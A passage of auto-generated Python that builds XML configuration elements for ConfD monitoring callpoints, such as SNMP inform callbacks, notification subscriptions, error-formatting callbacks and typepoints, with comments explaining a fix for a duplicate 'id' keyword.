"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")  # 'default' is an empty leaf in the confd-monitoring model; no text is set
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
daemon_id = ET.SubElement(daemon, "id")
# The generated code popped 'id' twice (the callback key above and the daemon
# id here), which raises KeyError; assume the daemon's id is passed as a
# distinct 'daemon_id' kwarg.
daemon_id.text = kwargs.pop('daemon_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
error = ET.SubElement(snmp_inform_callback, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id = ET.SubElement(snmp_notification_subscription, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
daemon_id = ET.SubElement(daemon, "id")
# The generated code popped 'id' twice (the subscription key above and the
# daemon id here), which raises KeyError; assume the daemon's id is passed as
# a distinct 'daemon_id' kwarg.
daemon_id.text = kwargs.pop('daemon_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
# The subscription list key already consumed kwargs['id'] above, so the
# generated pop of 'id' here always raised KeyError. Accept the daemon's
# id under the distinct keyword 'daemon_id' (assumed name).
id.text = kwargs.pop('daemon_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
error = ET.SubElement(snmp_notification_subscription, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id = ET.SubElement(error_formatting_callback, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
# The callback list key already consumed kwargs['id'] above, so the
# generated pop of 'id' here always raised KeyError. Accept the daemon's
# id under the distinct keyword 'daemon_id' (assumed name).
id.text = kwargs.pop('daemon_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
# The callback list key already consumed kwargs['id'] above, so the
# generated pop of 'id' here always raised KeyError. Accept the daemon's
# id under the distinct keyword 'daemon_id' (assumed name).
id.text = kwargs.pop('daemon_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
error = ET.SubElement(error_formatting_callback, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id = ET.SubElement(typepoint, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
# The typepoint list key already consumed kwargs['id'] above, so the
# generated pop of 'id' here always raised KeyError. Accept the daemon's
# id under the distinct keyword 'daemon_id' (assumed name).
id.text = kwargs.pop('daemon_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
# The typepoint list key already consumed kwargs['id'] above, so the
# generated pop of 'id' here always raised KeyError. Accept the daemon's
# id under the distinct keyword 'daemon_id' (assumed name).
id.text = kwargs.pop('daemon_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
